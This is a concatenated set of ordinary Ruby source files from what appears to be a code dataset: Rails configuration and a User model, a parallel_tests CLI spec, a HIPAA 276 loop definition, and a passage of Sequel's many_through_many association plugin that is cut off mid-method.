it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://bar:2424}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username_2}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password_2}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:\n - tag2:key2}) }
end
end
end
end
| 55.61157 | 114 | 0.575568 |
acf46839e32bcb5a06f86f4e42e4c43b35222f18 | 2,588 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
Bundler.require
require "help_tips"
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Enable escaping HTML in JSON.
config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
config.active_record.whitelist_attributes = true if Rails::VERSION::MAJOR <= 4
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
end
end
| 43.133333 | 100 | 0.732998 |
ab7affca9052a4ad8b2b25a15b10a8066d21c747 | 14,876 | #encoding: utf-8
require 'spec_helper'
describe 'CLI' do
before do
`rm -rf #{folder}`
end
after do
`rm -rf #{folder}`
end
def folder
"/tmp/parallel_tests_tests"
end
def write(file, content)
path = "#{folder}/#{file}"
ensure_folder File.dirname(path)
File.open(path, 'w'){|f| f.write content }
path
end
def read(file)
File.read "#{folder}/#{file}"
end
def bin_folder
"#{File.expand_path(File.dirname(__FILE__))}/../bin"
end
def executable(options={})
"#{bin_folder}/parallel_#{options[:type] || 'test'}"
end
def ensure_folder(folder)
`mkdir -p #{folder}` unless File.exist?(folder)
end
def run_tests(test_folder, options={})
ensure_folder folder
processes = "-n #{options[:processes]||2}" unless options[:processes] == false
command = "cd #{folder} && #{options[:export]} #{executable(options)} #{test_folder} #{processes} #{options[:add]} 2>&1"
result = `#{command}`
raise "FAILED #{command}\n#{result}" if $?.success? == !!options[:fail]
result
end
it "runs tests in parallel" do
write 'spec/xxx_spec.rb', 'describe("it"){it("should"){puts "TEST1"}}'
write 'spec/xxx2_spec.rb', 'describe("it"){it("should"){puts "TEST2"}}'
result = run_tests "spec", :type => 'rspec'
# test ran and gave their puts
result.should include('TEST1')
result.should include('TEST2')
# all results present
result.scan('1 example, 0 failure').size.should == 2 # 2 results
result.scan('2 examples, 0 failures').size.should == 1 # 1 summary
result.scan(/Finished in \d+\.\d+ seconds/).size.should == 2
result.scan(/Took \d+\.\d+ seconds/).size.should == 1 # parallel summary
end
it "runs tests which outputs accented characters" do
write "spec/xxx_spec.rb", "#encoding: utf-8\ndescribe('it'){it('should'){puts 'Byłem tu'}}"
result = run_tests "spec", :type => 'rspec'
# test ran and gave their puts
result.should include('Byłem tu')
end
it "does not run any tests if there are none" do
write 'spec/xxx_spec.rb', '1'
result = run_tests "spec", :type => 'rspec'
result.should include('No examples found')
result.should include('Took')
end
it "fails when tests fail" do
write 'spec/xxx_spec.rb', 'describe("it"){it("should"){puts "TEST1"}}'
write 'spec/xxx2_spec.rb', 'describe("it"){it("should"){1.should == 2}}'
result = run_tests "spec", :fail => true, :type => 'rspec'
result.scan('1 example, 1 failure').size.should == 1
result.scan('1 example, 0 failure').size.should == 1
result.scan('2 examples, 1 failure').size.should == 1
end
it "can serialize stdout" do
write 'spec/xxx_spec.rb', '5.times{describe("it"){it("should"){sleep 0.01; puts "TEST1"}}}'
write 'spec/xxx2_spec.rb', 'sleep 0.01; 5.times{describe("it"){it("should"){sleep 0.01; puts "TEST2"}}}'
result = run_tests "spec", :type => 'rspec', :add => "--serialize-stdout"
result.should_not =~ /TEST1.*TEST2.*TEST1/m
result.should_not =~ /TEST2.*TEST1.*TEST2/m
end
context "with given commands" do
it "can exec given commands with ENV['TEST_ENV_NUM']" do
result = `#{executable} -e 'ruby -e "print ENV[:TEST_ENV_NUMBER.to_s].to_i"' -n 4`
result.gsub('"','').split('').sort.should == %w[0 2 3 4]
end
it "can exec given command non-parallel" do
result = `#{executable} -e 'ruby -e "sleep(rand(10)/100.0); puts ENV[:TEST_ENV_NUMBER.to_s].inspect"' -n 4 --non-parallel`
result.split("\n").should == %w["" "2" "3" "4"]
end
it "can serialize stdout" do
result = `#{executable} -e 'ruby -e "5.times{sleep 0.01;puts ENV[:TEST_ENV_NUMBER.to_s].to_i;STDOUT.flush}"' -n 2 --serialize-stdout`
result.should_not =~ /0.*2.*0/m
result.should_not =~ /2.*0.*2/m
end
it "exists with success if all sub-processes returned success" do
system("#{executable} -e 'cat /dev/null' -n 4").should == true
end
it "exists with failure if any sub-processes returned failure" do
system("#{executable} -e 'test -e xxxx' -n 4").should == false
end
end
it "runs through parallel_rspec" do
version = `#{executable} -v`
`#{bin_folder}/parallel_rspec -v`.should == version
end
it "runs through parallel_cucumber" do
version = `#{executable} -v`
`#{bin_folder}/parallel_cucumber -v`.should == version
end
it "runs through parallel_spinach" do
version = `#{executable} -v`
`#{bin_folder}/parallel_spinach -v`.should == version
end
it "runs with --group-by found" do
# it only tests that it does not blow up, as it did before fixing...
write "spec/x1_spec.rb", "puts '111'"
run_tests "spec", :type => 'rspec', :add => '--group-by found'
end
it "runs faster with more processes" do
pending if RUBY_PLATFORM == "java" # just too slow ...
2.times{|i|
write "spec/xxx#{i}_spec.rb", 'describe("it"){it("should"){sleep 5}}; $stderr.puts ENV["TEST_ENV_NUMBER"]'
}
t = Time.now
run_tests("spec", :processes => 2, :type => 'rspec')
expected = 10
(Time.now - t).should <= expected
end
it "can run with given files" do
write "spec/x1_spec.rb", "puts '111'"
write "spec/x2_spec.rb", "puts '222'"
write "spec/x3_spec.rb", "puts '333'"
result = run_tests "spec/x1_spec.rb spec/x3_spec.rb", :type => 'rspec'
result.should include('111')
result.should include('333')
result.should_not include('222')
end
it "runs successfully without any files" do
results = run_tests "", :type => 'rspec'
results.should include("2 processes for 0 specs")
results.should include("Took")
end
it "can run with test-options" do
write "spec/x1_spec.rb", "111"
write "spec/x2_spec.rb", "111"
result = run_tests "spec",
:add => "--test-options ' --version'",
:processes => 2,
:type => 'rspec'
result.should =~ /\d+\.\d+\.\d+.*\d+\.\d+\.\d+/m # prints version twice
end
it "runs with PARALLEL_TEST_PROCESSORS processes" do
processes = 5
processes.times{|i|
write "spec/x#{i}_spec.rb", "puts %{ENV-\#{ENV['TEST_ENV_NUMBER']}-}"
}
result = run_tests "spec",
:export => "PARALLEL_TEST_PROCESSORS=#{processes}",
:processes => processes,
:type => 'rspec'
result.scan(/ENV-.?-/).should =~ ["ENV--", "ENV-2-", "ENV-3-", "ENV-4-", "ENV-5-"]
end
it "filters test by given pattern and relative paths" do
write "spec/x_spec.rb", "puts 'XXX'"
write "spec/y_spec.rb", "puts 'YYY'"
write "spec/z_spec.rb", "puts 'ZZZ'"
result = run_tests "spec", :add => "-p '^spec/(x|z)'", :type => "rspec"
result.should include('XXX')
result.should_not include('YYY')
result.should include('ZZZ')
end
it "can wait_for_other_processes_to_finish" do
pending if RUBY_PLATFORM == "java" # just too slow ...
write "test/a_test.rb", "require 'parallel_tests'; sleep 0.5 ; ParallelTests.wait_for_other_processes_to_finish; puts 'a'"
write "test/b_test.rb", "sleep 1; puts 'b'"
write "test/c_test.rb", "sleep 1.5; puts 'c'"
write "test/d_test.rb", "sleep 2; puts 'd'"
run_tests("test", :processes => 4).should include("b\nc\nd\na\n")
end
context "Test::Unit" do
it "runs" do
write "test/x1_test.rb", "require 'test/unit'; class XTest < Test::Unit::TestCase; def test_xxx; end; end"
result = run_tests("test")
result.should include('1 test')
end
it "passes test options" do
write "test/x1_test.rb", "require 'test/unit'; class XTest < Test::Unit::TestCase; def test_xxx; end; end"
result = run_tests("test", :add => '--test-options "-v"')
result.should include('test_xxx') # verbose output of every test
end
it "runs successfully without any files" do
results = run_tests("")
results.should include("2 processes for 0 tests")
results.should include("Took")
end
end
context "Cucumber" do
before do
write "features/steps/a.rb", "
Given('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }
And('I sleep a bit'){ sleep 0.2 }
And('I pass'){ true }
And('I fail'){ fail }
"
end
it "runs tests which outputs accented characters" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print accented characters"
write "features/steps/a.rb", "#encoding: utf-8\nGiven('I print accented characters'){ puts \"I tu też\" }"
result = run_tests "features", :type => "cucumber", :add => '--pattern good'
result.should include('I tu też')
end
it "passes TEST_ENV_NUMBER when running with pattern (issue #86)" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/b.feature", "Feature: xxx\n Scenario: xxx\n Given I FAIL"
write "features/steps/a.rb", "Given('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }"
result = run_tests "features", :type => "cucumber", :add => '--pattern good'
result.should include('YOUR TEST ENV IS 2!')
result.should include('YOUR TEST ENV IS !')
result.should_not include('I FAIL')
end
it "writes a runtime log" do
log = "tmp/parallel_runtime_cucumber.log"
write(log, "x")
2.times{|i|
# needs sleep so that runtime loggers dont overwrite each other initially
write "features/good#{i}.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n And I sleep a bit"
}
run_tests "features", :type => "cucumber"
read(log).gsub(/\.\d+/,'').split("\n").should =~ [
"features/good0.feature:0",
"features/good1.feature:0"
]
end
it "runs each feature once when there are more processes then features (issue #89)" do
2.times{|i|
write "features/good#{i}.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
}
result = run_tests "features", :type => "cucumber", :add => '-n 3'
result.scan(/YOUR TEST ENV IS \d?!/).sort.should == ["YOUR TEST ENV IS !", "YOUR TEST ENV IS 2!"]
end
it "runs successfully without any files" do
results = run_tests("", :type => "cucumber")
results.should include("2 processes for 0 features")
results.should include("Took")
end
it "collates failing scenarios" do
write "features/pass.feature", "Feature: xxx\n Scenario: xxx\n Given I pass"
write "features/fail1.feature", "Feature: xxx\n Scenario: xxx\n Given I fail"
write "features/fail2.feature", "Feature: xxx\n Scenario: xxx\n Given I fail"
results = run_tests "features", :processes => 3, :type => "cucumber", :fail => true
results.should include """
Failing Scenarios:
cucumber features/fail2.feature:2 # Scenario: xxx
cucumber features/fail1.feature:2 # Scenario: xxx
3 scenarios (2 failed, 1 passed)
3 steps (2 failed, 1 passed)
"""
end
it "groups by scenario" do
write "features/long.feature", <<-EOS
Feature: xxx
Scenario: xxx
Given I print TEST_ENV_NUMBER
Scenario: xxx
Given I print TEST_ENV_NUMBER
Scenario Outline: xxx
Given I print TEST_ENV_NUMBER
Examples:
| num |
| one |
| two |
EOS
result = run_tests "features", :type => "cucumber", :add => "--group-by scenarios"
result.should include("2 processes for 4 scenarios")
end
it "groups by step" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
result = run_tests "features", :type => "cucumber", :add => '--group-by steps'
result.should include("2 processes for 2 features")
end
end
context "Spinach", :fails_on_ruby_187 => true do
before do
write "features/steps/a.rb", "class A < Spinach::FeatureSteps\n Given 'I print TEST_ENV_NUMBER' do\n puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\"\n end\n And 'I sleep a bit' do\n sleep 0.2\n end\nend"
end
it "runs tests which outputs accented characters" do
write "features/good1.feature", "Feature: a\n Scenario: xxx\n Given I print accented characters"
write "features/steps/a.rb", "#encoding: utf-8\nclass A < Spinach::FeatureSteps\nGiven 'I print accented characters' do\n puts \"I tu też\" \n end\nend"
result = run_tests "features", :type => "spinach", :add => 'features/good1.feature'#, :add => '--pattern good'
result.should include('I tu też')
end
it "passes TEST_ENV_NUMBER when running with pattern (issue #86)" do
write "features/good1.feature", "Feature: a\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: a\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/b.feature", "Feature: b\n Scenario: xxx\n Given I FAIL" #Expect this not to be run
write "features/steps/a.rb", "class A < Spinach::FeatureSteps\nGiven('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }\nend"
result = run_tests "features", :type => "spinach", :add => '--pattern good'
result.should include('YOUR TEST ENV IS 2!')
result.should include('YOUR TEST ENV IS !')
result.should_not include('I FAIL')
end
it "writes a runtime log" do
pending 'not yet implemented -- custom runtime logging'
log = "tmp/parallel_runtime_spinach.log"
write(log, "x")
2.times{|i|
# needs sleep so that runtime loggers dont overwrite each other initially
write "features/good#{i}.feature", "Feature: A\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n And I sleep a bit"
}
result = run_tests "features", :type => "spinach"
read(log).gsub(/\.\d+/,'').split("\n").should =~ [
"features/good0.feature:0",
"features/good1.feature:0"
]
end
it "runs each feature once when there are more processes then features (issue #89)" do
2.times{|i|
write "features/good#{i}.feature", "Feature: A\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n"
}
result = run_tests "features", :type => "spinach", :add => '-n 3'
result.scan(/YOUR TEST ENV IS \d?!/).sort.should == ["YOUR TEST ENV IS !", "YOUR TEST ENV IS 2!"]
end
it "runs successfully without any files" do
results = run_tests("", :type => "spinach")
results.should include("2 processes for 0 features")
results.should include("Took")
end
end
end
| 37.660759 | 225 | 0.627857 |
4a78b890ec7dc4d233bc80a45dc7646106220835 | 85 | require_relative "../support/job_buffer"
class ApplicationJob < ActiveJob::Base
end
| 17 | 40 | 0.8 |
010bc2f51de28424a71936471f611967d2a47ae1 | 1,019 | module Hippo_eyeDoc::TransactionSets
module HIPAA_276
class L2000B < Hippo_eyeDoc::TransactionSets::Base
loop_name 'L2000B' #Information Receiver Level
#Information Receiver Level
segment Hippo_eyeDoc::Segments::HL,
:name => 'Information Receiver Level',
:minimum => 1,
:maximum => 1,
:position => 100,
:identified_by => {
'HL03' => '21',
'HL04' => '1'
}
#Information Receiver Name
loop Hippo_eyeDoc::TransactionSets::HIPAA_276::L2100B,
:name => 'Information Receiver Name',
:minimum => 1,
:maximum => 1,
:position => 500,
:identified_by => {
'NM1.NM101' => '41',
'NM1.NM102' => ["1", "2"],
'NM1.NM108' => '46'
}
end
end
end
| 30.878788 | 64 | 0.42787 |
012762200dbfb477e44d1ff7b0bfb87a25b65f8c | 2,638 | class User < ApplicationRecord
include SimpleDiscussion::ForumUser
# Include default devise modules. Others available are:
# and :omniauthable
devise :invitable, :database_authenticatable, :registerable,
:recoverable, :rememberable, :validatable,
:confirmable, :lockable, :timeoutable, :trackable
attr_accessor :canonical_subdomain
before_destroy :ensure_final_user
PRIVATE_ATTRIBUTES = [
:encrypted_password,
:reset_password_token,
:reset_password_sent_at,
:remember_created_at,
:sign_in_count,
:current_sign_in_at,
:last_sign_in_at,
:current_sign_in_ip,
:last_sign_in_ip,
:confirmation_token,
:confirmed_at,
:confirmation_sent_at,
:unconfirmed_email,
:failed_attempts,
:unlock_token,
:locked_at,
:invitation_token,
:invitation_created_at,
:invitation_sent_at,
:invitation_accepted_at,
:invitation_limit ,
:invited_by_type,
:invited_by_id,
:invitations_count
]
FULL_PERMISSIONS = {
can_access_admin: true,
can_manage_web: true,
can_manage_analytics: true,
can_manage_email: true,
can_manage_users: true,
can_manage_blog: true,
can_manage_api: true,
can_manage_subdomain_settings: true,
can_manage_api: true,
can_view_restricted_pages: true,
moderator: true
}
SESSION_TIMEOUT = [
{
label: '1 hour',
exec: '1.hour',
slug: '1-hour'
},
{
label: '3 hours',
exec: '3.hours',
slug: '3-hour'
},
{
label: '6 hours',
exec: '6.hours',
slug: '6-hour'
},
{
label: '1 day',
exec: '1.day',
slug: '1-day'
},
{
label: '1 week',
exec: '1.week',
slug: '1-week'
}
]
validates :session_timeoutable_in, inclusion: { in: User::SESSION_TIMEOUT.map{ |n| n[:slug] } }
has_one_attached :avatar
# to run User.find(123).visits
has_many :visits, class_name: "Ahoy::Visit"
def subdomain
Apartment::Tenant.current
end
def self.global_admins
self.where(global_admin: true)
end
def self.forum_mods
self.where(moderator: true)
end
def previous_ahoy_visits
Ahoy::Visit.where(user_id: self.id).order(started_at: :desc).limit(5)
end
def self.public_attributes
attribute_names - PRIVATE_ATTRIBUTES.map(&:to_s)
end
def timeout_in
timeout = User::SESSION_TIMEOUT.detect{|n| n[:slug] == self.session_timeoutable_in }[:exec]
eval(timeout)
end
private
def ensure_final_user
if Rails.env != 'test'
if User.all.size - 1 == 0
throw :abort
end
end
end
end
| 20.936508 | 97 | 0.651251 |
91d620a91221baa7a39dac85eddb7e762077e083 | 87 | num = 987_298
if num.even?
puts 'Число четное'
else
puts 'Число нечетное'
end
| 10.875 | 25 | 0.666667 |
877a095f72780fa1eee41fae2452990c52c50c51 | 21,240 | # frozen-string-literal: true
module Sequel
module Plugins
# The many_through_many plugin allow you to create an association using multiple join tables.
# For example, assume the following associations:
#
# Artist.many_to_many :albums
# Album.many_to_many :tags
#
# The many_through_many plugin would allow this:
#
# Artist.plugin :many_through_many
# Artist.many_through_many :tags, [[:albums_artists, :artist_id, :album_id], [:albums_tags, :album_id, :tag_id]]
#
# Which will give you the tags for all of the artist's albums.
#
# Let's break down the 2nd argument of the many_through_many call:
#
# [[:albums_artists, :artist_id, :album_id],
# [:albums_tags, :album_id, :tag_id]]
#
# This argument is an array of arrays with three elements. Each entry in the main array represents a JOIN in SQL:
#
# first element :: represents the name of the table to join.
# second element :: represents the column used to join to the previous table.
# third element :: represents the column used to join to the next table.
#
# So the "Artist.many_through_many :tags" is translated into something similar to:
#
# FROM artists
# JOIN albums_artists ON (artists.id = albums_artists.artist_id)
# JOIN albums_tags ON (albums_artists.album_id = albums_tag.album_id)
# JOIN tags ON (albums_tags.tag_id = tags.id)
#
# The "artists.id" and "tags.id" criteria come from other association options (defaulting to the primary keys of the current and
# associated tables), but hopefully you can see how each argument in the array is used in the JOIN clauses. Note that you do
# not need to add an entry for the final table (tags in this example), as that comes from the associated class.
#
# Here are some more examples:
#
# # Same as Artist.many_to_many :albums
# Artist.many_through_many :albums, [[:albums_artists, :artist_id, :album_id]]
#
# # All artists that are associated to any album that this artist is associated to
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums_artists, :album_id, :artist_id]]
#
# # All albums by artists that are associated to any album that this artist is associated to
# Artist.many_through_many :artist_albums, [[:albums_artists, :artist_id, :album_id],
# [:albums_artists, :album_id, :artist_id], [:albums_artists, :artist_id, :album_id]],
# class: :Album
#
# # All tracks on albums by this artist (also could be a many_to_many)
# Artist.many_through_many :tracks, [[:albums_artists, :artist_id, :album_id]],
# right_primary_key: :album_id
#
# Often you don't want the current object to appear in the array of associated objects. This is easiest to handle via an :after_load hook:
#
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums_artists, :album_id, :artist_id]],
# after_load: lambda{|artist, associated_artists| associated_artists.delete(artist)}
#
# You can also handle it by adding a dataset block that excludes the current record (so it won't be retrieved at all), but
# that won't work when eagerly loading, which is why the :after_load proc is recommended instead.
#
# It's also common to not want duplicate records, in which case the :distinct option can be used:
#
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums, :id, :id], [:albums_artists, :album_id, :artist_id]],
# distinct: true
#
# In addition to many_through_many, this plugin also adds one_through_many, for an association to a single object through multiple join tables.
# This is useful if there are unique constraints on the foreign keys in the join tables that reference back to the current table, or if you want
# to set an order on the association and just want the first record.
#
# Usage:
#
# # Make all model subclasses support many_through_many associations
# Sequel::Model.plugin :many_through_many
#
# # Make the Album class support many_through_many associations
# Album.plugin :many_through_many
module ManyThroughMany
# The AssociationReflection subclass for many_through_many associations.
class ManyThroughManyAssociationReflection < Sequel::Model::Associations::ManyToManyAssociationReflection
Sequel.synchronize{Sequel::Model::Associations::ASSOCIATION_TYPES[:many_through_many] = self}
# many_through_many and one_through_many associations can be clones
def cloneable?(ref)
ref[:type] == :many_through_many || ref[:type] == :one_through_many
end
# The default associated key alias(es) to use when eager loading
# associations via eager.
def default_associated_key_alias
self[:uses_left_composite_keys] ? (0...self[:through].first[:left].length).map{|i| :"x_foreign_key_#{i}_x"} : :x_foreign_key_x
end
%w'associated_key_table predicate_key edges final_edge final_reverse_edge reverse_edges'.each do |meth|
class_eval(<<-END, __FILE__, __LINE__+1)
def #{meth}
cached_fetch(:#{meth}){calculate_edges[:#{meth}]}
end
END
end
FINALIZE_SETTINGS = superclass::FINALIZE_SETTINGS.merge(
:associated_key_table=>:associated_key_table,
:edges=>:edges,
:final_edge=>:final_edge,
:final_reverse_edge=>:final_reverse_edge,
:reverse_edges=>:reverse_edges
).freeze
def finalize_settings
FINALIZE_SETTINGS
end
# The alias for the first join table.
def join_table_alias
final_reverse_edge[:alias]
end
# Many through many associations don't have a reciprocal
def reciprocal
nil
end
# Whether a separate query should be used for each join table.
def separate_query_per_table?
self[:separate_query_per_table]
end
private
def _associated_dataset
ds = associated_class
if separate_query_per_table?
ds = ds.dataset
else
(reverse_edges + [final_reverse_edge]).each do |t|
h = {:qualify=>:deep}
if t[:alias] != t[:table]
h[:table_alias] = t[:alias]
end
ds = ds.join(t[:table], Array(t[:left]).zip(Array(t[:right])), h)
end
end
ds
end
# Make sure to use unique table aliases when lazy loading or eager loading
def calculate_reverse_edge_aliases(reverse_edges)
aliases = [associated_class.table_name]
reverse_edges.each do |e|
table_alias = e[:table]
if aliases.include?(table_alias)
i = 0
table_alias = while true
ta = :"#{table_alias}_#{i}"
break ta unless aliases.include?(ta)
i += 1
end
end
aliases.push(e[:alias] = table_alias)
end
end
# Transform the :through option into a list of edges and reverse edges to use to join tables when loading the association.
def calculate_edges
es = [{:left_table=>self[:model].table_name, :left_key=>self[:left_primary_key_column]}]
self[:through].each do |t|
es.last.merge!(:right_key=>t[:left], :right_table=>t[:table], :join_type=>t[:join_type]||self[:graph_join_type], :conditions=>(t[:conditions]||[]).to_a, :block=>t[:block])
es.last[:only_conditions] = t[:only_conditions] if t.include?(:only_conditions)
es << {:left_table=>t[:table], :left_key=>t[:right]}
end
es.last.merge!(:right_key=>right_primary_key, :right_table=>associated_class.table_name)
edges = es.map do |e|
h = {:table=>e[:right_table], :left=>e[:left_key], :right=>e[:right_key], :conditions=>e[:conditions], :join_type=>e[:join_type], :block=>e[:block]}
h[:only_conditions] = e[:only_conditions] if e.include?(:only_conditions)
h
end
reverse_edges = es.reverse.map{|e| {:table=>e[:left_table], :left=>e[:left_key], :right=>e[:right_key]}}
reverse_edges.pop
calculate_reverse_edge_aliases(reverse_edges)
final_reverse_edge = reverse_edges.pop
final_reverse_alias = final_reverse_edge[:alias]
h = {:final_edge=>edges.pop,
:final_reverse_edge=>final_reverse_edge,
:edges=>edges,
:reverse_edges=>reverse_edges,
:predicate_key=>qualify(final_reverse_alias, edges.first[:right]),
:associated_key_table=>final_reverse_edge[:alias],
}
h.each{|k, v| cached_set(k, v)}
h
end
def filter_by_associations_limit_key
fe = edges.first
Array(qualify(fe[:table], fe[:right])) + Array(qualify(associated_class.table_name, associated_class.primary_key))
end
end
class OneThroughManyAssociationReflection < ManyThroughManyAssociationReflection
Sequel.synchronize{Sequel::Model::Associations::ASSOCIATION_TYPES[:one_through_many] = self}
include Sequel::Model::Associations::SingularAssociationReflection
end
module ClassMethods
# Create a many_through_many association. Arguments:
# name :: Same as associate, the name of the association.
# through :: The tables and keys to join between the current table and the associated table.
# Must be an array, with elements that are either 3 element arrays, or hashes with keys :table, :left, and :right.
# The required entries in the array/hash are:
# :table (first array element) :: The name of the table to join.
# :left (middle array element) :: The key joining the table to the previous table. Can use an
# array of symbols for a composite key association.
# :right (last array element) :: The key joining the table to the next table. Can use an
# array of symbols for a composite key association.
# If a hash is provided, the following keys are respected when using eager_graph:
# :db :: The Database containing the table. This changes lookup to use a separate query for each join table.
# :block :: A proc to use as the block argument to join.
# :conditions :: Extra conditions to add to the JOIN ON clause. Must be a hash or array of two pairs.
# :join_type :: The join type to use for the join, defaults to :left_outer.
# :only_conditions :: Conditions to use for the join instead of the ones specified by the keys.
# opts :: The options for the associaion. Takes the same options as many_to_many.
def many_through_many(name, through, opts=OPTS, &block)
associate(:many_through_many, name, opts.merge(through.is_a?(Hash) ? through : {:through=>through}), &block)
end
# Creates a one_through_many association. See many_through_many for arguments.
def one_through_many(name, through, opts=OPTS, &block)
associate(:one_through_many, name, opts.merge(through.is_a?(Hash) ? through : {:through=>through}), &block)
end
private
# Create the association methods and :eager_loader and :eager_grapher procs.
def def_many_through_many(opts)
one_through_many = opts[:type] == :one_through_many
opts[:read_only] = true
if opts[:uniq]
opts[:after_load] ||= []
opts[:after_load].unshift(:array_uniq!)
end
opts[:cartesian_product_number] ||= one_through_many ? 0 : 2
separate_query_per_table = false
through = opts[:through] = opts[:through].map do |e|
case e
when Array
raise(Error, "array elements of the through option/argument for many_through_many associations must have at least three elements") unless e.length == 3
{:table=>e[0], :left=>e[1], :right=>e[2]}
when Hash
raise(Error, "hash elements of the through option/argument for many_through_many associations must contain :table, :left, and :right keys") unless e[:table] && e[:left] && e[:right]
separate_query_per_table = true if e[:db]
e
else
raise(Error, "the through option/argument for many_through_many associations must be an enumerable of arrays or hashes")
end
end
opts[:separate_query_per_table] = separate_query_per_table
left_key = opts[:left_key] = opts[:through].first[:left]
lcks = opts[:left_keys] = Array(left_key)
uses_lcks = opts[:uses_left_composite_keys] = left_key.is_a?(Array)
left_pk = (opts[:left_primary_key] ||= self.primary_key)
raise(Error, "no primary key specified for #{inspect}") unless left_pk
opts[:eager_loader_key] = left_pk unless opts.has_key?(:eager_loader_key)
opts[:left_primary_keys] = Array(left_pk)
lpkc = opts[:left_primary_key_column] ||= left_pk
lpkcs = opts[:left_primary_key_columns] ||= Array(lpkc)
opts[:left_key_alias] ||= opts.default_associated_key_alias
if separate_query_per_table
opts[:use_placeholder_loader] = false
opts[:allow_eager_graph] = false
opts[:allow_filtering_by] = false
opts[:eager_limit_strategy] = nil
opts[:dataset] ||= proc do |r|
def_db = r.associated_class.db
vals = uses_lcks ? [lpkcs.map{|k| get_column_value(k)}] : get_column_value(left_pk)
has_results = through.each do |edge|
ds = (edge[:db] || def_db).from(edge[:table]).where(edge[:left]=>vals)
ds = ds.where(edge[:conditions]) if edge[:conditions]
right = edge[:right]
vals = ds.select_map(right)
if right.is_a?(Array)
vals.delete_if{|v| v.any?(&:nil?)}
else
vals.delete(nil)
end
break if vals.empty?
end
ds = r.associated_dataset.where(opts.right_primary_key=>vals)
ds = ds.clone(:no_results=>true) unless has_results
ds
end
opts[:eager_loader] ||= proc do |eo|
h = eo[:id_map]
assign_singular = opts.assign_singular?
uses_rcks = opts.right_primary_key.is_a?(Array)
rpk = uses_rcks ? opts.right_primary_keys : opts.right_primary_key
name = opts[:name]
def_db = opts.associated_class.db
join_map = h
run_query = through.each do |edge|
ds = (edge[:db] || def_db).from(edge[:table])
ds = ds.where(edge[:conditions]) if edge[:conditions]
left = edge[:left]
right = edge[:right]
prev_map = join_map
join_map = ds.where(left=>join_map.keys).select_hash_groups(right, left)
if right.is_a?(Array)
join_map.delete_if{|v,| v.any?(&:nil?)}
else
join_map.delete(nil)
end
break if join_map.empty?
join_map.each_value do |vs|
vs.replace(vs.flat_map{|v| prev_map[v]})
vs.uniq!
end
end
eo = Hash[eo]
if run_query
eo[:loader] = false
eo[:right_keys] = join_map.keys
else
eo[:no_results] = true
end
opts[:model].eager_load_results(opts, eo) do |assoc_record|
rpkv = if uses_rcks
assoc_record.values.values_at(*rpk)
else
assoc_record.values[rpk]
end
objects = join_map[rpkv]
if assign_singular
objects.each do |object|
object.associations[name] ||= assoc_record
end
else
objects.each do |object|
object.associations[name].push(assoc_record)
end
end
end
end
else
opts[:dataset] ||= opts.association_dataset_proc
opts[:eager_loader] ||= opts.method(:default_eager_loader)
end
join_type = opts[:graph_join_type]
select = opts[:graph_select]
graph_block = opts[:graph_block]
only_conditions = opts[:graph_only_conditions]
use_only_conditions = opts.include?(:graph_only_conditions)
